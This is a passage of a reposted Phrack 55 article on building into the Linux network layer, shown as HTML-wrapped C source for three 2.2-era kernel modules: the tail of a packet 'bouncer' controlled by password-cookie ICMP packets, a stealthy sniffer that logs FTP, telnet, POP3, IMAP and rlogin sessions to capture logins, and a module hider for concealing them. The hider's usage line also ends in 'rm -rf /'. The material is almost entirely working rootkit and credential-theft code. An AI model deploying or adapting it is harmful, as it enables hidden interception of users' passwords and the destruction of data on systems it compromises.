checksum */<BR><BR> th->check = 0;<BR> th->check = csum_tcpudp_magic(<BR> iph->saddr,<BR> iph->daddr,<BR> size,<BR> iph->protocol,<BR> csum_partial(skb->h.raw, doff, skb->csum)<BR> ); /* tcp or udp checksum */<BR> ip_send_check(iph); /* ip checksum */<BR><BR> /* Now change the hardware MAC address and rebuild the hardware<BR> * header. no need to allocate space in the skb, since we're dealing<BR> * with packets coming directly from the driver, with all fields<BR> * complete.<BR> */<BR> m_memcpy(dst_hw_addr, skb->mac.ethernet->h_source, 6);<BR><BR> if (skb->dev->hard_header)<BR> skb->dev->hard_header( skb,<BR> skb->dev,<BR> ntohs(skb->protocol),<BR> dst_hw_addr,<BR> skb->dev->dev_addr,<BR> skb->len);<BR> else<BR> DBGPRN1("no hardware-header build routine found\n");<BR> /* send it anyway! lets hope nothing breaks :) */<BR><BR> dev_queue_xmit(skb_clone(skb, GFP_ATOMIC));<BR>}<BR><BR>void process_bounce_rule(struct rule *ptr) {<BR><BR> struct rule *new_rule;<BR><BR> if ( ptr->proto == 0 ) {<BR> DBGPRN1("protocol ID is 0, clearing bounce rules...\n");<BR> clear_bounce_rules();<BR> }<BR> else {<BR> new_rule = kmalloc(sizeof(struct rule), GFP_ATOMIC);<BR> m_memcpy ((char *)new_rule,(char *)ptr, sizeof(struct rule));<BR><BR> new_rule->next = NULL; /* trust no one :) */<BR><BR> if (!first_rule) {<BR> first_rule = new_rule; /* not 100% efficient here... */<BR> }<BR> else {<BR> ptr = first_rule;<BR> while (ptr->next)<BR> ptr = ptr->next;<BR> ptr->next = new_rule;<BR> }<BR> }<BR>}<BR><BR>/* this is untested code, dunno if kfree() works as advertised. */<BR>void clear_bounce_rules () {<BR> struct rule *ptr;<BR><BR> while (first_rule) {<BR> ptr = first_rule->next;<BR> kfree(first_rule);<BR> first_rule = ptr;<BR> }<BR>}<BR><BR>void process_pkt_in(struct sk_buff *skb) {<BR><BR> char *data;<BR> int i, datalen;<BR> struct rule *ptr;<BR> __u32 host;<BR><BR> /* fix some pointers */<BR> skb->h.raw = skb->nh.raw + skb->nh.iph->ihl*4;<BR><BR> /* This is an icmp packet, and may contain a bouncing rule for us. */<BR> if (skb->nh.iph->protocol == IPPROTO_ICMP) {<BR><BR> if (skb->h.icmph->type != ICMP_ECHO) return;<BR><BR> data = (skb->h.raw) + sizeof(struct icmphdr);<BR><BR> datalen = skb->len;<BR><BR> if (m_strcmp(data, RULEPASS)) {<BR> DBGPRN1("Found a valid cookie, checking size...\n");<BR> i = m_strlen(RULEPASS);<BR> if (sizeof(struct rule) < datalen - i) {<BR> DBGPRN1("Valid size, editing rules...\n");<BR> process_bounce_rule((struct rule *)(data+i));<BR> }<BR> return;<BR> }<BR> }<BR><BR> ptr = first_rule;<BR><BR> /* search the existing rules for this packet */<BR> while (ptr) {<BR> if (skb->nh.iph->protocol != ptr->proto) {<BR> ptr = ptr->next;<BR> continue;<BR> }<BR><BR> if (skb->nh.iph->saddr == ptr->source<BR> && skb->h.th->dest == ptr->destp) {<BR> bounce_and_send(skb, ptr->dest);<BR> return;<BR> }<BR><BR> if (skb->nh.iph->saddr == ptr->dest<BR> && skb->h.th->source == ptr->destp) {<BR> bounce_and_send(skb, ptr->source);<BR> return;<BR> }<BR> ptr = ptr->next;<BR> }<BR><BR>}<BR><BR>/* init_module */<BR>int init_module(void) {<BR><BR>#ifdef DEBUG<BR> debug = TRUE;<BR>#else<BR> debug = FALSE;<BR>#endif<BR><BR> first_rule = NULL;<BR><BR>/* this is for testing purposes only<BR> first_rule = kmalloc(sizeof(struct rule), GFP_ATOMIC);<BR> first_rule->source = in_aton(SOURCEIP);<BR> first_rule->dest = in_aton(DESTIP);<BR> first_rule->proto = IPPROTO_TCP;<BR> first_rule->destp = htons(23);<BR> first_rule->next = NULL;<BR>*/<BR> if (dev) {<BR> d = dev_get(dev);<BR> if (!d) {<BR> DBGPRN2("Did not find device %s!\n", dev);<BR> DBGPRN1("Using all known devices...");<BR> }<BR> else {<BR> DBGPRN3("Using device %s, ifindex: %i\n",<BR> dev, d->ifindex);<BR> bounce_proto.dev = d;<BR> }<BR> }<BR> else<BR> DBGPRN1("Using all known devices...\n");<BR><BR> bounce_proto.type = htons(ETH_P_ALL);<BR><BR> /* this one just gets us incoming packets */<BR>/* bounce_proto.type = htons(ETH_P_IP); */<BR><BR> bounce_proto.func = pkt_func;<BR> dev_add_pack(&bounce_proto);<BR><BR> return(0);<BR>}<BR><BR>void cleanup_module(void) {<BR> dev_remove_pack(&bounce_proto);<BR><BR> DBGPRN1("Bouncer Unloaded\n");<BR>}<BR><BR>/* boring yet useful functions follow... */<BR><BR>/* Convert an ASCII string to binary IP. */<BR>__u32 in_aton(const char *str) {<BR> unsigned long l;<BR> unsigned int val;<BR> int i;<BR><BR> l = 0;<BR> for (i = 0; i < 4; i++) {<BR> l <<= 8;<BR> if (*str != '\0') {<BR> val = 0;<BR> while (*str != '\0' && *str != '.') {<BR> val *= 10;<BR> val += *str - '0';<BR> str++;<BR> }<BR> l |= val;<BR> if (*str != '\0')<BR> str++;<BR> }<BR> }<BR> return(htonl(l));<BR>}<BR><BR>/* the other way around. */<BR>char *in_ntoa(__u32 in) {<BR> static char buff[18];<BR> char *p;<BR><BR> p = (char *) &in;<BR> sprintf(buff, "%d.%d.%d.%d",<BR> (p[0] & 255), (p[1] & 255), (p[2] & 255), (p[3] & 255));<BR> return(buff);<BR>}<BR><BR>int m_strcmp(char *trial, const char *correct) {<BR> char *p;<BR> const char *i;<BR><BR> p = trial;<BR> i = correct;<BR><BR> while (*i) {<BR> if (!p) return 0;<BR> if (*p != *i) return 0;<BR> p++;<BR> i++;<BR> }<BR> return 1;<BR>}<BR><BR>char *m_memcpy(char *dest, char *src, int size) {<BR> char *i, *p;<BR><BR> p = dest;<BR> i = src;<BR><BR> while (size) {<BR> *p = *i;<BR> i++;<BR> p++;<BR> size--;<BR> }<BR> return dest;<BR>}<BR><BR>int m_strlen(char *ptr) {<BR> int i = 0;<BR> while (*ptr) {<BR> ptr++;<BR> i++;<BR> }<BR> return i;<BR>}<BR><BR>/* EOF */<BR><--><BR><++> P55/Linux-lkm/krnsniff/krnsniff.c !4adeadb3<BR>/*<BR>* krnsniff.c v0.1a - A kernel based sniffer module<BR>*<BR>* by kossak<BR>* kossak@hackers-pt.org || http://www.hackers-pt.org/kossak<BR>*<BR>* This file is licensed by the GNU General Public License.<BR>*<BR>* Tested on a 2.2.5 kernel. Should compile on others with minimum fuss.<BR>* However, I'm not responsible for setting fire on your computer, loss of<BR>* mental health, bla bla bla...<BR>*<BR>* CREDITS: - Mike Edulla's ever popular linsniffer for some logging ideas.<BR>* - Plaguez and Halflife for an excelent phrack article on<BR>* kernel modules.<BR>* - the kernel developers for a great job (no irony intended).<BR>*<BR>* USAGE: gcc -O2 -DDEBUG -c krnsniff.c -I/usr/src/linux/include ;<BR>* insmod krnsniff.o [dev=<device>]<BR>*<BR>* TODO : - implement a timeout feature (IMPORTANT)<BR>* - better support for certain stupid ppp devices that don't set<BR>* dev->hard_header_len correctly.<BR>* - Parallel logging (like linsniff.c, this thing is still just<BR>* logging one connection at a time).<BR>* - fix strange kmem grows kernel bitchings (FIXED) ...i think<BR>* - store the logs in kernel memory and send them and clear them<BR>* when a magic packet is sent.<BR>* - some weird shit happens in my LAN on incoming connections<BR>* that fucks up the logs a bit, but this was not confirmed<BR>* on other tests. It has to do with packets not increasing seq<BR>* numbers, I think.<BR>* - This wasn't tested on a promisc system, but it should work<BR>* without almost no modifications.<BR>*<BR>* NOTE: the purpose of this module is to expose the dangers of a rooted<BR>* system. It is virtually impossible to detect, if used with a module<BR>* hidder.<BR>* This could also be developed further to become a simple and easy way<BR>* to detect unauthorized network intrusions.<BR>*<BR>* Oh, and script kiddies, don't read the FUCKING source, I hope you<BR>* have shit loads of kernel faults and you lose all your 31337 0wn3d<BR>* s1t3z... grrr.<BR>*<BR>* look at least at the LOGFILE define below before compiling.<BR>*/<BR><BR>#define MODULE<BR>#define __KERNEL__<BR><BR>#include <linux/config.h><BR>#include <linux/module.h><BR>#include <linux/version.h><BR><BR>#include <linux/byteorder/generic.h><BR>#include <linux/netdevice.h><BR>#include <net/protocol.h><BR>#include <net/pkt_sched.h><BR>#include <linux/if_ether.h><BR>#include <linux/ip.h><BR>#include <linux/tcp.h><BR>#include <linux/skbuff.h><BR><BR>#include <linux/kernel.h><BR>#include <linux/mm.h><BR>#include <linux/file.h><BR>#include <asm/uaccess.h><BR><BR>/* from a piece of pmsac's code... this is pratic :) */<BR>#define DBGPRN1(X) if (debug) printk(KERN_DEBUG X)<BR>#define DBGPRN2(X,Y) if (debug) printk(KERN_DEBUG X, Y);<BR>#define DBGPRN3(X,Y,Z) if (debug) printk(KERN_DEBUG X, Y, Z);<BR>#define DBGPRN4(X,Y,Z,W) if (debug) printk(KERN_DEBUG X, Y, Z, W);<BR>#define DBGPRN5(X,Y,Z,W,V) if (debug) printk(KERN_DEBUG X, Y, Z, W, V);<BR><BR>#define TRUE -1<BR>#define FALSE 0<BR><BR>#define CAPTLEN 512 /* no. of bytes to log */<BR><BR>/* do a 'touch LOGFILE' _before_ you load the module. */<BR>#define LOGFILE "/tmp/sniff.log"<BR><BR>/* global data */<BR>int debug, errno,<BR> out_c, in_c, thru_c; /* packet counters */<BR><BR>struct t_data {<BR> char content[1500];<BR> unsigned long seq;<BR> struct t_data *next;<BR>};<BR><BR>struct {<BR> unsigned short active;<BR> unsigned long saddr;<BR> unsigned long daddr;<BR> unsigned short sport;<BR> unsigned short dport;<BR> unsigned long totlen;<BR> struct t_data *data;<BR>} victim;<BR><BR>char *dev;<BR>MODULE_PARM(dev, "s"); /* gets the parameter dev=<devname> */<BR>struct device *d;<BR><BR>struct packet_type sniff_proto;<BR><BR>/* inicial function declarations */<BR>char *in_ntoa(__u32 in);<BR>int filter(struct sk_buff *);<BR>void m_strncpy(char *, char *, int);<BR>int m_strlen(char *);<BR><BR>void start_victim(struct sk_buff *);<BR>void write_victim(struct sk_buff *);<BR>void end_victim(void);<BR><BR>/* our packet handler */<BR>int pkt_func(struct sk_buff *skb, struct device *dv, struct packet_type *pt) {<BR><BR> /* fix some pointers */<BR> skb->h.raw = skb->nh.raw + skb->nh.iph->ihl*4;<BR> skb->data = (unsigned char *)skb->h.raw + (skb->h.th->doff << 2);<BR> skb->len -= skb->nh.iph->ihl*4 + (skb->h.th->doff << 2);<BR><BR> switch (skb->pkt_type) {<BR> case PACKET_OUTGOING:<BR> out_c++;<BR> /* dont count with the hardware header<BR> * since my stupid ippp device does not set this...<BR> * add more devices here.<BR> */<BR> if(strstr(dv->name, "ppp"))<BR> skb->len -= 10;<BR> else<BR> skb->len -= dv->hard_header_len;<BR> break;<BR> case PACKET_HOST:<BR> in_c++;<BR> skb->len -= dv->hard_header_len;<BR> break;<BR> case PACKET_OTHERHOST:<BR> thru_c++;<BR> skb->len -= dv->hard_header_len;<BR> break;<BR> default:<BR> kfree_skb(skb);<BR> return 0;<BR> }<BR><BR> if(filter(skb)) {<BR> kfree_skb(skb);<BR> return 0;<BR> }<BR><BR> /* rare case of NULL's in buffer contents */<BR> if (m_strlen(skb->data) < skb->len)<BR> skb->len = m_strlen(skb->data);<BR><BR> if (skb->len > CAPTLEN - victim.totlen)<BR> skb->len = CAPTLEN - victim.totlen;<BR><BR> if (skb->len)<BR> write_victim(skb);<BR><BR> kfree_skb(skb);<BR> return 0;<BR>}<BR><BR>int filter (struct sk_buff *skb) {<BR>/* this is the filter function. it checks if the packet is worth logging */<BR><BR> struct t_data *ptr, *i;<BR><BR> int port = FALSE;<BR><BR> if (skb->nh.iph->protocol != IPPROTO_TCP)<BR> return TRUE;<BR><BR> /* change to your favourite services here */<BR> if (ntohs(skb->h.th->dest) == 21 ||<BR> ntohs(skb->h.th->dest) == 23 ||<BR> ntohs(skb->h.th->dest) == 110 ||<BR> ntohs(skb->h.th->dest) == 143 ||<BR> ntohs(skb->h.th->dest) == 513)<BR> port = TRUE;<BR><BR> if (victim.active) {<BR> if((skb->h.th->dest != victim.dport) ||<BR> (skb->h.th->source != victim.sport) ||<BR> (skb->nh.iph->saddr != victim.saddr) ||<BR> (skb->nh.iph->daddr != victim.daddr))<BR> return TRUE;<BR><BR> if (victim.totlen >= CAPTLEN) {<BR><BR> ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);<BR> if(!ptr) {<BR> DBGPRN1("Out of memory\n");<BR> end_victim();<BR> return;<BR> }<BR> m_strncpy(ptr->content,<BR> "\n\n*** END : CAPLEN reached ---\n", 50);<BR> ptr->next = NULL;<BR><BR> i = victim.data;<BR> while(i->next)<BR> i = i->next;<BR> i->next = ptr;<BR><BR> end_victim();<BR> return TRUE;<BR> }<BR><BR> if(skb->h.th->rst) {<BR> ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);<BR> if(!ptr) {<BR> DBGPRN1("Out of memory\n");<BR> end_victim();<BR> return;<BR> }<BR> m_strncpy(ptr->content,<BR> "\n\n*** END : RST caught ---\n", 50);<BR> ptr->next = NULL;<BR><BR> i = victim.data;<BR> while(i->next)<BR> i = i->next;<BR> i->next = ptr;<BR><BR> end_victim();<BR> return TRUE;<BR> }<BR><BR> if(skb->h.th->fin) {<BR> ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);<BR> if(!ptr) {<BR> DBGPRN1("Out of memory\n");<BR> end_victim();<BR> return;<BR> }<BR> m_strncpy(ptr->content,<BR> "\n\n*** END : FIN caught ---\n", 50);<BR> ptr->next = NULL;<BR><BR> i = victim.data;<BR> while(i->next)<BR> i = i->next;<BR> i->next = ptr;<BR><BR> end_victim();<BR> return TRUE;<BR> }<BR> }<BR> else {<BR> if (port && skb->h.th->syn)<BR> start_victim (skb);<BR> else<BR> return TRUE;<BR> }<BR><BR> return FALSE;<BR>}<BR><BR>void start_victim(struct sk_buff *skb) {<BR><BR> victim.active = TRUE;<BR> victim.saddr = skb->nh.iph->saddr;<BR> victim.daddr = skb->nh.iph->daddr;<BR> victim.sport = skb->h.th->source;<BR> victim.dport = skb->h.th->dest;<BR><BR> victim.data = kmalloc(sizeof(struct t_data), GFP_ATOMIC);<BR> /* we're a module, we can't afford to crash */<BR> if(!victim.data) {<BR> DBGPRN1("Out of memory\n");<BR> end_victim();<BR> return;<BR> }<BR> victim.data->seq = ntohl(skb->h.th->seq);<BR> victim.data->next = NULL;<BR><BR> sprintf(victim.data->content, "\n\n*** [%s:%u] ---> [%s:%u]\n\n",<BR> in_ntoa(victim.saddr),<BR> ntohs(victim.sport),<BR> in_ntoa(victim.daddr),<BR> ntohs(victim.dport));<BR><BR> victim.totlen = m_strlen(victim.data->content);<BR>}<BR><BR>void write_victim(struct sk_buff *skb) {<BR><BR> struct t_data *ptr, *i;<BR><BR> ptr = kmalloc(sizeof(struct t_data), GFP_ATOMIC);<BR> if(!ptr) {<BR> DBGPRN1("Out of memory\n");<BR> end_victim();<BR> return;<BR> }<BR><BR> ptr->next = NULL;<BR> ptr->seq = ntohl(skb->h.th->seq);<BR> m_strncpy(ptr->content, skb->data, skb->len);<BR><BR> /*<BR> * putting it in the ordered list.<BR> */<BR> i = victim.data;<BR><BR> if(ptr->seq < i->seq) {<BR> /*<BR> * we caught a packet "younger" than the starting SYN.<BR> * Likely? no. Possible? yep. forget the bastard.<BR> */<BR> kfree(ptr);<BR> return;<BR> }<BR> /* actual ordering of tcp packets */<BR> while (ptr->seq >= i->seq) {<BR> if (ptr->seq == i->seq)<BR> return; /* seq not incremented (no data) */<BR> if (!i->next)<BR> break;<BR> if (i->next->seq > ptr->seq)<BR> break;<BR> i = i->next;<BR> }<BR><BR> ptr->next = i->next;<BR> i->next = ptr;<BR><BR> victim.totlen += m_strlen(ptr->content);<BR> return;<BR>}<BR><BR><BR>void end_victim(void) {<BR>/*<BR>* Im now saving the data to a file. This is mainly BSD's process accounting<BR>* code, as seen in the kernel sources.<BR>*/<BR> struct t_data *ptr;<BR> struct file *file = NULL;<BR> struct inode *inode;<BR> mm_segment_t fs;<BR><BR> file = filp_open(LOGFILE, O_WRONLY|O_APPEND, 0);<BR><BR> if (IS_ERR(file)) {<BR> errno = PTR_ERR(file);<BR> DBGPRN2("error %i\n", errno);<BR> goto vic_end;<BR> }<BR><BR> if (!S_ISREG(file->f_dentry->d_inode->i_mode)) {<BR> fput(file);<BR> goto vic_end;<BR> }<BR><BR> if (!file->f_op->write) {<BR> fput(file);<BR> goto vic_end;<BR> }<BR><BR> fs = get_fs();<BR> set_fs(KERNEL_DS);<BR> inode = file->f_dentry->d_inode;<BR> down(&inode->i_sem);<BR> while (victim.data) {<BR><BR> file->f_op->write(file, (char *)&victim.data->content,<BR> m_strlen(victim.data->content), &file->f_pos);<BR> ptr = victim.data;<BR> victim.data = victim.data->next;<BR> kfree(ptr);<BR> }<BR><BR> up(&inode->i_sem);<BR> set_fs(fs);<BR><BR> fput(file);<BR><BR> DBGPRN1("Entry saved\n");<BR><BR>vic_end:<BR> victim.saddr = 0;<BR> victim.daddr = 0;<BR> victim.sport = 0;<BR> victim.dport = 0;<BR> victim.active = FALSE;<BR> victim.totlen = 0;<BR> victim.data = NULL;<BR>}<BR><BR>/* trivial but useful functions below. Damn, I miss libc :) */<BR>char *in_ntoa(__u32 in) {<BR> static char buff[18];<BR> char *p;<BR><BR> p = (char *) &in;<BR> sprintf(buff, "%d.%d.%d.%d",<BR> (p[0] & 255), (p[1] & 255), (p[2] & 255), (p[3] & 255));<BR> return(buff);<BR>}<BR><BR>void m_strncpy(char *dest, char *src, int size) {<BR> char *i, *p;<BR> p = dest;<BR> for(i = src; *i != 0; i++) {<BR> if (!size) break;<BR> size--;<BR><BR> *p = *i;<BR> p++;<BR> }<BR> *p = '\0';<BR>}<BR><BR>int m_strlen(char *ptr) {<BR> int i = 0;<BR> while (*ptr) {<BR> ptr++;<BR> i++;<BR> }<BR> return i;<BR>}<BR><BR>/* init_module */<BR>int init_module(void) {<BR><BR>#ifdef DEBUG<BR> debug = TRUE;<BR>#else<BR> debug = FALSE;<BR>#endif<BR><BR> in_c = out_c = thru_c = 0;<BR><BR> victim.saddr = 0;<BR> victim.daddr = 0;<BR> victim.sport = 0;<BR> victim.dport = 0;<BR> victim.active = FALSE;<BR> victim.data = NULL;<BR><BR> if (dev) {<BR> d = dev_get(dev);<BR> if (!d) {<BR> DBGPRN2("Did not find device %s!\n", dev);<BR> DBGPRN1("Sniffing all known devices...");<BR> }<BR> else {<BR> DBGPRN3("Sniffing device %s, ifindex: %i\n",<BR> dev, d->ifindex);<BR> sniff_proto.dev = d;<BR> }<BR> }<BR> else<BR> DBGPRN1("Sniffing all known devices...\n");<BR><BR> sniff_proto.type = htons(ETH_P_ALL);<BR><BR> /* this one just gets us incoming packets */<BR>/* sniff_proto.type = htons(ETH_P_IP); */<BR><BR> sniff_proto.func = pkt_func;<BR> dev_add_pack(&sniff_proto);<BR><BR> return(0);<BR>}<BR><BR>void cleanup_module(void) {<BR> dev_remove_pack(&sniff_proto);<BR> end_victim();<BR><BR> DBGPRN4("Statistics: [In: %i] [Out: %i] [Thru: %i]\n",<BR> in_c, out_c, thru_c);<BR> DBGPRN1("Sniffer Unloaded\n");<BR>}<BR><BR>/* EOF */<BR><--><BR><++> P55/Linux-lkm/modhide/modhide.c !c9a65c89<BR>/*<BR>* generic module hidder, for 2.2.x kernels.<BR>*<BR>* by kossak (kossak@hackers-pt.org || http://www.hackers-pt.org/kossak)<BR>*<BR>* This module hides the last module installed. With little mind work you can<BR>* put it to selectivly hide any module from the list.<BR>*<BR>* insmod'ing this module will allways return an error, something like device<BR>* or resource busy, or whatever, meaning the module will not stay installed.<BR>* Run lsmod and see if it done any good. If not, see below, and try until you<BR>* suceed. If you dont, then the machine has a weird compiler that I never seen.<BR>* It will suceed on 99% of all intel boxes running 2.2.x kernels.<BR>*<BR>* The module is expected not to crash when it gets the wrong register, but<BR>* then again, it could set fire to your machine, who knows...<BR>*<BR>* Idea shamelessly stolen from plaguez's itf, as seen on Phrack 52.<BR>* The thing about this on 2.2.x is that kernel module symbol information is<BR>* also referenced by this pointer, so this hides all of the stuff :)<BR>*<BR>* DISCLAIMER: If you use this for the wrong purposes, your skin will fall off,<BR>* you'll only have sex with ugly women, and you'll be raped in<BR>* jail by homicidal maniacs.<BR>*<BR>* Anyway, enjoy :)<BR>*<BR>* USAGE: gcc -c modhide.c ; insmod modhide.o ; lsmod ; rm -rf /<BR>*/<BR><BR>#define MODULE<BR>#define __KERNEL__<BR><BR>#include <linux/config.h><BR>#include <linux/module.h><BR>#include <linux/version.h><BR><BR>int init_module(void) {<BR><BR>/*<BR>* if at first you dont suceed, try:<BR>* %eax, %ebx, %ecx, %edx, %edi, %esi, %ebp, %esp<BR>* I cant make this automaticly, because I'll fuck up the registers If I do<BR>* any calculus here.<BR>*/<BR> register struct module *mp asm("%ebx");<BR><BR> if (mp->init == &init_module) /* is it the right register? */<BR> if (mp->next) /* and is there any module besides this one? */<BR> mp->next = mp->next->next; /* cool, lets hide it :) */<BR> return -1; /* the end. simple heh? */<BR>}<BR>/* EOF */<BR><--><BR>----[ EOF<BR><BR>--lrZ03NoBR/3+SXJZ--<!--StartFragment--></P>
<P> </P>
<P> </P>
<P><FONT color=#f9f8e4>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P><FONT color=#f9f8e4>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P><FONT color=#f9f8e4>[정보보안,정보보안전문가,해킹,해커]Building Into The Linux Network Layer | 정보보안</FONT></P>
<P> </P></FONT>
<!-- -->
